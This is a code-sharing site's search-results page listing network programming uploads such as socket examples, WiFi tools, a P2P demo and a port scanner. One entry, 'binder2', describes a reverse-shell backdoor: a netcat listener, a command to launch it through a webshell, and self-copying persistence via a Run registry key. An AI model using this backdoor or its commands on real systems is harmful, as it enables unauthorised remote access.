Welcome![Sign In][Sign Up]
Location:
Search - Network Connect

Search list

[WinSock-NDISctrl_lan

Description: excel winsock2.0 network connect
Platform: | Size: 63017 | Author: 赵立杰 | Hits:

[WinSock-NDISBeej-s-Guide-to-Network-Programming

Description: [介绍   Socket 编程让你沮丧吗?从man pages中很难得到有用的信息吗?你想跟上时代去编Internet相关的程序,但是为你在调用 connect() 前的bind() 的结构而不知所措?等等… 好在我已经将这些事完成了,我将和所有人共享我的知识了。如果你了解 C 语言并想穿过网络编程的沼泽,那么你来对地方了。
Platform: | Size: 23234 | Author: lllstar | Hits:

[Report papers可信网络连接关键技术研究与实现

Description: With the accelerate implementation of information and the rapid development of e-commerce and e-government, the network security is of great significance. Now people are more concerned about how to ensure working at a trusted network environment. In view of the existing network problems, the concept of trusted networks is put forward by scholars, and trusted network is becoming the focus in current academic areas. A trusted network connect system is designed and implemented based on analysis and research on Trusted Network Connection(TNC) and remote attestation mechanism. The system is implemented using the TNC@FHH framework according to the trusted network connection specification of Trusted Computing Group(TCG). The design and implementation of the Integrity Measurement Collector(IMC),Integrity Measurement Verifier(IMV), Platform Trust Service(PTS) and Policy Server in the system is discussed in this paper. IMC/IMV is designed and implemented based on platform integrity, Trojan and virus, and IMC/IMV is provided to TNC@FHH framework as dynamic link library. The remote attestation message between IMC and IMV is formatted by XML file. The measure of PTS is added at the system start, and the integrity of client components in trusted network connect is measured by PTS, and then the trust chain extends to the boundary of local access network. The platform integrity information is collected by PTS, and the information is sent to IMV by IMC, then the information is verified by IMV. Thus, the trust chain extends to network. In finally, the validation idea is proposed as validation policy based on the strategic combinations, and the validation policy varies with the network protection resources. Keywords: TNC Platform Trust Service IMC IMV Remote Attestation
Platform: | Size: 3079900 | Author: pongiddinky | Hits:

[VOIP programip phone

Description: 网络电话例程,可以连接本机做测试!--Network telephone example, and it can connect to local machine to do a test!
Platform: | Size: 84992 | Author: 站长 | Hits:

[AI-NN-PR自组织特征映射应用实例

Description: 开发环境:Matlab 简要说明:自组织特征映射模型(Self-Organizing feature Map),认为一个神经网络接受外界输入模式时,将会分为不同的区域,各区域对输入模式具有不同的响应特征,同时这一过程是自动完成的。各神经元的连接权值具有一定的分布。最邻近的神经元互相刺激,而较远的神经元则相互抑制,更远一些的则具有较弱的刺激作用。自组织特征映射法是一种无教师的聚类方法。-development environment : Matlab Brief Description : Self-Organizing Map model (Self-Organizing Map feature), a neural network that external input mode, will be divided into different regions, the regional input to the model with different response characteristics and the process is automatic End %. The neurons connect with the right to a certain value of the distribution. Most neighboring neurons stimulate each other, distant neurons were mutual inhibition, the vision has a weaker stimulus. Self-organizing feature mapping method is a non-teachers clustering method.
Platform: | Size: 1024 | Author: 李洋 | Hits:

[Firewall-Securitybinder2

Description: 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358. 程序会复制自身到c:\winnt\下名为syslog.exe,并在 HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat- vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \ winnt \ named syslog.exe and HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \ CurrentVe
Platform: | Size: 12288 | Author: 张军 | Hits:

[P2PliubingP2P

Description: 用UDP实现了p2p是的穿透,P2PServer运行在一个拥有公网IP的计算机上,P2PClient运行在两个不同的NAT后(注意,如果两个客户端运行在一个NAT后,本程序很可能不能运行正常,这取决于你的NAT是否支持loopback translation,详见http://midcom-p2p.sourceforge.net/draft-ford-midcom-p2p-01.txt,当然,此问题可以通过双方先尝试连接对方的内网IP来解决,但是这个代码只是为了验证原理,并没有处理这些问题),后登录的计算机可以获得先登录计算机的用户名,后登录的计算机通过send username message的格式来发送消息。如果发送成功,说明你已取得了直接与对方连接的成功。-achieved using UDP p2p is the piercing, P2PServer operation in a public IP with the computer, P2PClient running in two different NAT after (Note If two clients running on a NAT, the procedure may not be operating normally, It depends on whether you support the loopback NAT translation, see http :// midcom-p2p.sourceforge.net/draft-ford- midcom- p2p- 01.txt, of course, this problem can be made by the two sides try to connect with each other to resolve the IP network, but the code is to verify principle, not dealing with these issues), after the computer can log logged in a computer user name, after logged by the computer username send the message format to send information. If the success of this show that you have made a direct link with each other's success.
Platform: | Size: 31744 | Author: 刘冰 | Hits:

[ICQ-IM-ChatWlanTools

Description: Using this tools, you can create an AdHoc network and connect to AP network,just like windows WiFi tools-tools, you can create an TCP network and connect to the AP network, just like windows WiFi tools
Platform: | Size: 58368 | Author: cuihongyi | Hits:

[OtherUSB.to.Ethernet.Connector.v2.4

Description: 将USB端口设备虚拟为网卡设备的软件,还可以-The USB port equipment for the virtual network adapter software, you can
Platform: | Size: 3307520 | Author: 辛慧 | Hits:

[Internet-NetworkLinuxWork

Description: 该例子程序为cgi相关的小程序,通过网络控制来找到连接服务器所有客户端的状态。-Examples of procedures for the cgi-related small procedures, through the network connect to a server control to find the status of all clients.
Platform: | Size: 2048 | Author: 付潇潇 | Hits:

[Sniffer Package capturesniffer

Description: 扫描器是网络信息收集的一种方法,从功能上可分为漏洞扫描和端口扫描。通过实验,掌握漏洞、端口的基础知识,掌握扫描器的基本原理并设计实现端口扫描和漏洞扫描程序。网络端口扫描器的工作原理是通过socket套接字对端口使用connect()进行连接,并记录目标主机给予的回答,搜集目标主机的各种有用信息。 程序采用MFC编程,为提高扫描速度,加入多线程支持。-Scanner is a network of information-gathering methods, from the functions can be divided into vulnerability scanning and port scanning. Through the experiment, have loopholes, port the basic knowledge to grasp the basic principles of scanners designed to achieve port scanning and vulnerability scanning procedures. Network port scanner working principle through socket socket on port use connect () to connect to, and record the target host to give the answer, the collection of target host a variety of useful information. Procedures for the use of MFC programming, to improve the scanning speed, by adding multi-threading support.
Platform: | Size: 2048 | Author: 姚晓光 | Hits:

[Internet-NetworkOnItFirewall

Description: 程序功能齐全很专业。支持监控包括传输控制协议和 UDP 的所有的互联网传输协议。同时程序具有实时文件防修改监控功能,可以杜绝其他程序对主要系统文件的修改,而且你可以进行一键还原。同时和一些商业版的防火墙一样,支持以IP地址和端口的规则设置。可以自动屏蔽一些端口,系统提供了人性化的温馨入侵提示,如告诉你危险程序,是否安全以及等级等等。 该防火墙还具有检测你的网络速度,可以实时查看每一个连接IP的网速,最主要的是非常快速并且稳定-Procedures for full-featured very professional. Support for monitoring, including Transmission Control Protocol and UDP all Internet Transfer Protocol. At the same time, with real-time document the procedures to amend anti-monitoring function, can be prevented in the other programs on the major changes to system files, and you can be a key to restore. At the same time and some, like the commercial version of the firewall, support for IP address and port set the rules. Can automatically shield some ports, the system provides a warm human invasion prompted, such as the risk of the procedure to tell you whether the level of security and so on. The firewall also has detected the speed of your network, you can connect in real-time view of every IP network speed, the most important thing is very fast and stable
Platform: | Size: 1018880 | Author: 浪子 | Hits:

[TCP/IP stackCode

Description: 网络的相关知识,网络程序的编写,Socket是连接应用程序与网络驱动程序的桥梁,Socket在应用程序中创建,通过bind与驱动程序建立关系-Network-related knowledge, procedures for the preparation of the network, Socket is to connect applications and bridge network driver, Socket in the application to create, through the bind with the driver to establish relations
Platform: | Size: 2358272 | Author: maomao | Hits:

[Internet-Networkctrl_lan

Description: excel winsock2.0 network connect
Platform: | Size: 62464 | Author: 赵立杰 | Hits:

[TCP/IP stackconnect+disconnect

Description: linux c 网络编程 实tcp的链接和断开 非常适合于初学者-linux c network programming is tcp disconnect the link and very suitable for beginners
Platform: | Size: 14336 | Author: | Hits:

[Bookschat

Description: 实现了局域网聊天室,大家可以在局域网上聊天。先启动SERVER,那再用客户端连接-Realize the local area network chat rooms, you can chat in the local area network. First start the SERVER, then reuse the client to connect
Platform: | Size: 97280 | Author: bac | Hits:

[Telnet Clientnetwork_connect

Description: 一个通用的网络通信程序,新手,各位大虾多多批评哈-A common network communication procedures, novice, ladies and a lot of criticism of Kazakhstan prawns
Platform: | Size: 49152 | Author: 宋福 | Hits:

[Internet-NetworkBeej-s-Guide-to-Network-Programming

Description: [介绍   Socket 编程让你沮丧吗?从man pages中很难得到有用的信息吗?你想跟上时代去编Internet相关的程序,但是为你在调用 connect() 前的bind() 的结构而不知所措?等等… 好在我已经将这些事完成了,我将和所有人共享我的知识了。如果你了解 C 语言并想穿过网络编程的沼泽,那么你来对地方了。-[Socket programming allows you to introduce you depressed? From the man pages it is difficult to get useful information? On the times you want to provision Internet related program, but for you to call connect () before bind () the structure and what to do? And so on ... Fortunately, I have these things completed, I will share my knowledge of all the. If you understand the C language and want to network programming through the swamp, then you come to the right place.
Platform: | Size: 22528 | Author: lllstar | Hits:

[Internet-NetworkWireless.Connect.DisConnect

Description: 利用Native Wifi API实现wifi等无线设备连接ap router和判断网络状态的源代码,由于网络原因之前上传的是ras api 实现无线上网卡拨号上网的源程序 -Using Native Wifi API wifi and other wireless devices to achieve ap router and determine the network status of the source code, the network itself is the ras api previously uploaded a wireless network card dial-up source
Platform: | Size: 2697216 | Author: 肖宏岩 | Hits:

[Internet-NetworkNetwok.Connect.DisConnecte

Description: 提供wireless wifi联网,断网,和判断网络状态源代码 用Native Wifi API 实现 -Provide wireless wifi networking, off network, and to determine the network status of the source code to achieve with the Native Wifi API
Platform: | Size: 58542080 | Author: 肖宏岩 | Hits:
« 12 3 4 5 6 7 8 9 10 ... 31 »

CodeBus www.codebus.net